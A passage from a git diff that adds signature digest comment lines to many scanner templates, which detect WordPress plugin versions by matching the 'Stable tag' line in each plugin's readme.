http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202fea1bf2d48770fc4fbcc554aa9cef723bf56caa18e56864505103c7358fde7402202cd4ccb764fb1cf9177cfb3d069f08594266b5093a5b2b58cd808278edb10339:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index f6a7836f35..66a105c519 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201746f3f62ba854d46255ac026fc3ea78889924e9ed43b577ab7efd4a13a26d0c02201d6fbf8d38ae2962ae43ce15a92528d4d6c33fb778c8f3496b9f5726e0c990f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index b7af708c4f..82f2dc715e 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a42204a78fdb50361b2bab7584eddf9ed4f3ba2d72f89fcc6e3db2b97da9c65302210081e34b6057c03809d84a336f1b8c447c0e0b1af6e9e7b55b375cee8148a045e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 61a793edf7..da39da3d19 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220740080347f4b8ea0dc36b16649aecb31f6bea55dfab2df46cd7db486ac70a0c902210091100d0ad386191b3dceef5f8baf06d2e46372d7adf04de0f64102276e6a57ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 0da88d5d3f..49ec7c970b 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220543eca4d585e4fb63e3c17abd7dce63ab67b17788a2873cc6ef7ec61dcb05290022010eb3ded875287eb7735ea11336600039ee16be233819f0a9fa5f1a604ec9f31:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 2b29428cf1..02e8bdab0b 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d233fb53510e7a4a38c85339516d3793eb45b98966b26b670ef012d132cecc810220468c8523a8e34e6d34d586bd0a15736fef0dc8e2576883e98dd81b5b8746631d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 181e619a7c..9b3d1edbfa 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200225471835b0282c9a0a3bb1439f4ea7d759167d46475d00e1dd34462b78b9a902203bccb19818ee16b8b5b55fac2777b1082b9b34d39bb7b2ac22b0943d65bfc293:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8164eb4483..0251fe7757 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206bd4b5f92665974ead76cd6f81be7d9593ed48d433397af98a126e7cb12453ef02203030894f62bcde694efbfccc83c49efce5bdca935cde22b1dd9e600ee9a1e5c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 59554defdf..489c3d65cd 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100dc042a77e356ced2b6fd9f2e90b9b108e598832bb5a63c39ce1286a3e81729b9022100c2e659263bcd0fdb68d2a10f0133f6d6e6ecf3367e4e1d69b164c8a4397c6a56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 350fd9436b..febda8083f 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c69d3bfa799cf41f99bab5ecdd98571e675e559db7d5f0aff26201541da55334022016326280a2f99b05dc954439c4d774a1b1de5efccb4c0ccd23e3da8446c92dad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 2ae6bafbba..322bc8ca55 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022034f40e2527edd66b6797dde02b84fd0aa49d0295d247eaf4c2003173535dc36802206edf0fdecae1ce3f0cb19eacd6a91cba99ba974506752a0dea4755fbbadbfb52:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d0dc8d92bb..c534865cdb 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220396ea0f808a1eca0b5cb05b34c80108810397b89d689d7cc6c27415cbbaec47502203cc7c9633ae7b18b945901de2c6fef7ae91e559023b15a1eaca4d281a6729b1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index c49bbc2b6d..8b42336c57 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210085ae162d85f69546c5dce8fb5fe111cc318f0f70bb9d30367e4fe08741589be7022100de6a28d6c09d679de5ca7f0eb3f8c1342bfcc2ca67345429d8bf610c62b31c56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 27586cbd9d..da53bf12e0 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c8a8d85fea21e68a24758dba48216a6cf18eb47c68ebdeb6ca90e392c38b6106022100c6b7ce9d93cdfedc3c03aabf83ffdf53f8881156d93015d6faa802da96dc1700:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 946272f0a9..be131e7dab 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201bf04802b91778da3ab13333513c40efbea485103ab535cde8ceab9fdb896e73022100fd7cb1d3f5292d26089c6726b1f8907afea0902db73de56d39ddf2db1d3cb04e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index aa29706872..a503496ee9 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207735da4fbd555d90df6fa5ae8eb77ea9006536cc89d74210b504ac608f5ed2ed022100c1c5e341f7cdb051a663f73d723a87f6ab2f17ce2f96ed8c891b20cf298ce08d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 290d53ab7e..aaeb646eb3 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008f7e2d16e6725024b97321d9313b8aa859b5187eab482ba811412d201ff39584022100b24646495074e2944246db4b9ac6d9f6714495b295b288c946316640d97ec644:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index f7c9ef9b1f..5b05f353d2 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022072d5d9cc5c8d8fe2ad3ae89c6ec1d49b693f631f324da14ed52b7a2cd7fe6a39022100f44208abf96116a5262f1c9df5dc2d752ac397ebbb9ed90cf0af6949e482ffbf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index f1c16275a2..3110f68c03 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206978f2a5eeb0e4e06ea8fd84816808dc136d317210063c6d3d8bbf2af5f091db02206a7a4decf092781356e14b3fec61f36c664fef9e1d0471977b599701ceb67e23:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index fc072e19d8..b6b805e7aa 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b20fb98d302e77b17d7fdbb9d91f39237639f6bc5454be1223de7a055487670402204b5a35562696757bae01c7d25a1de495b3fbf4d94e0fb2a1748bb0659cb40e06:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index da9df0e8a5..3f153dcb31 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e33069f7306ae534b000668126a7d2e5cff20ac25362949bb94a6010b35c0062022035f44aad1774c9f430ac075062581d934a60586b2fb6a90d6101aab9683ddba6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index f8113d9750..709a7cad25 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207249df520ad7fcf503dd3275423b58b20d82975a96541e21524999e35378b2f8022044d22547ed6626f6f58412e61ef0ee2206b0a2c4f60edae3f32f2c87dfb8556d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 5f80282ab2..11eaffd989 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203d6e839cd2b47ee5b38a5d9d4b09c3d08034da1b12892d330b211f92177f83e10220387453835006479e1dccaa349539ac639a86cff94d5f9d28c69c83889e5d577a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 5725d5bb3f..5921cd6a5b 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022038c9511eb9a2ab504e207edb05687b4b0c90969cd45be71109b2e4cbd2679c4702207640388f7b296c86bef7cd4b6abe548cb049089a09f6c5c279508947d82d643e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index f67a8bc18a..7579e83c8d 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204697b75f7f12aa99e4b47c595a95ccac8c1976bef3f0e0e2862225156dc68ec3022100973dc1bad9b666521fcb7b425c7a4dd782b940ccd0aa7683895ba5219b9d7276:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-crontrol.yaml b/http/technologies/wordpress/plugins/wp-crontrol.yaml index a773829b7d..a5a784f31e 100644 --- a/http/technologies/wordpress/plugins/wp-crontrol.yaml +++ b/http/technologies/wordpress/plugins/wp-crontrol.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009727c94add2088a16fc7c11936ef9b510d155778d2623ef7bc78d7cc75cbd6d602206f8451373d3831252f81b843ab0f241707d0ab873614f3a5b8965f3b055b7b85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index b9bd4be0a8..af995b1ac0 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022033a0fc385c571da98b5716d81fc1d79af06ce232b724957e1462fe63c8cdaa93022047012171fba62e7a74ee9f9eec6e1cc2b91f9abe37c1419fab6720fc4ffca34c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index bece4ce486..dd6d8f8b92 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206dc0069eb4c69e49587a9c4ac6111d54f761ad76743ba3566cc7cf374ed8435002205a28908fce1c00805280f5072b80476215e8d98bb7200a6b42d4b798edd3bf77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 138b0aa9a6..bfb8f96050 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100aadbe7739a840e6a0a73acbdffab30036d053dc539a92cec967b0ca6661c5d8502200c059e8ea4634427858269d7c3f7e771d8491962c2d895f27e2b600ec065751c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 68bf71bc83..60bff1dac4 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220509ed99458adebf73ba6a1544a3ed9ec6a2725a41f0099e03599f9b72b438632022100ccde7e77f7c557d190d6ee532d8d5a19db7735344e832bfbb87c721a5c358bd1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 10dad2d2fb..7a79deef56 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022049daa7ae0c28b4fe35f761df86cc74f925686d8b65a78ceea049880d8aa62c1902207ab4bccb5b8d03a6aea53812d8c9cb37cf91b1a2580738bbacb21de5e8e57e1b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index e9efe6fb53..2c59597026 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207ce8ba9e536dc4e9745bd6ecd1f70e0d107e793f9666d3a403abca2364e09c8a022100bb1df911f805e6b746f15758f663c0602ed6541bffd221278570c9cd8c418e4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index c3d10f0135..f1e14c8274 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cddad8b56797a61198b10b8eff72b08094039b522fb6efbf017c911d068ed4ae022100ed5f7418c3b2289998a68442c6b8833eeaa45766ca1d44b50cd8ad4c91826ed6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 4a8bc6b75c..d17efd380f 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201eed31729980408179239c38b22002287404e9494c562bf765a2f8d63d91e8e402202d993c7b8c1ce041bdc1f42d29c120966ed186b424d9577f0a9d22af9b6e3e94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index d2c74355bd..fed04b3fc4 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b9a5a2faca84daa8a74b32020f45abfbba913686c6701d36c97b1fabd848d4c002204eee008999f79cb1718b28cd7a928e5659fc6fae9ae5bfc6704f77d24bb32198:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 94b8494b08..ac1bcd84cd 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206cdedd174e07ace79078b3fdfa1bbdf00373cbf1ccca98c2278efa69a2b66b2c02204f4c9123aedc1aea38fdd42b099fe776c278c4ec826b02c7bd0d770d5ead0692:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 108aba79e9..7096786cab 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220065153c4545832922fafb426ce15c93585829d339c82b1be974369d0b332638e022100bd485b7ecf8efc69816aca0493813b474769721b7f5aa278793ed55a63438622:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index f6f6bf5566..9b56f0a0c8 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008c51bad14a40eee9b9c0fa0c2b6e601c9de1826032674c39cbf09a0450cd062202201d9b62129f1adee5f082340f91bec6a0de6b5fc23092cb2014c3b78376b9320b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 483cb7cac7..547223f0f5 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b840c9992737385ee8c1ce8a6e42a6eda1be43dda5d7ea4801febb8254e8260e022100f83a31c24c3ff82eab1a0da303678f259aa1659d3c3f74b2259b3be77addaa4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index a132c98df4..151169d4cf 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100da08259ef4341d16043fde598428d2c011ebe1b687c84b30516593253933368c02210080d46c1bcc06a9334cd6556f4d3a14b0e8b193458965dd8f250dab13bd91b987:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 135bbee046..dc8710647e 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204573961b5b2a672f5d70628c915417ae0b018b783bfefc65b45ef958a2d4410d022020ebfd477ee028ac61ed0ef7ec868f3cc46b106e89635e8fa7c8df1fd59a260e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 5b690d96c0..726bc8d866 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a263806c0272f67045533ad7260b657b59467c426ad5c92595da516da53370ec022100b10d4a4d5034ebdac337081ea9dbdae7c94b9231ad9dfa10e7c031a470d41390:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 16c7d6cff5..3618c14ba4 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022068967b48171aa8f0880937b8a0f25f635f1e37e36caf822bf7309c4f3d671d270220607741796c65939a9559efbec708c7ed2f9e66726f08fe01a309f6a1a0332e4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index ab099f357e..b367488775 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203eddc36f7df6c346e1f612625ebdea5b63cd21f4ca40d6bcdbfa20a719232a71022100c044cc9384b51d4b20e8bb90b899afa943036fb807f5da25bb4c885d66268220:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index ad0b8f8fed..44b8ba493f 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f7449ea94b86a10c7db1a6f157d7cf4690f3c9d0145eea577554bf1199f76cbf022100afe6d02eeb064d29c13d58c887c1ebd4a95ad737dbde18a9a89a00edcf7fa427:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index aaaf0f9a17..fcee5e1f1a 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100adfc1ee84a13f8af0b8751c0c1b2b9ccbbb8e5f34e71376d7590f38286ce611f022100dc879b139684539aa18b641881d05673e1617de198e776a2557a067ad904381d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index f943c7afeb..b3af2e9525 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022047bd2c1e9190eba585550f7e7923a5c4465d601deeee6985aa5fe393834d433f0220084ef4c1d80a909809310dee02c45a291b8085a05e68156efa36c5170e10a347:922c64590222798bb761d5b6d8e72950 \ 